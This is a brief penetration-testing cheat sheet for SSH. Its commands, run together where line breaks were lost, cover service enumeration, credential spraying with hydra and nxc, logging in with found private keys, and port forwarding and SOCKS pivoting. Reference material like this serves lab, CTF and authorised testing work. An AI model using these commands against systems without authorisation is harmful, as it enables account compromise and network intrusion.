Secure Shell — grab version, enumerate auth methods, spray creds, and hunt for weak keys.
nmap -p22 -sV -sC $tnmap -p22 --script ssh2-enum-algos,ssh-auth-methods $tssh-audit $thydra -L users.txt -P pass.txt ssh://$tnxc ssh $t -u users.txt -p passwords.txtIf you find a private key, try it with -i. Check for passphrase-less keys.
ssh -i id_rsa user@$tchmod 600 id_rsa && ssh -i id_rsa user@$tssh -L 8080:localhost:80 user@$tssh -D 1080 user@$tssh -R 4444:localhost:4444 user@$t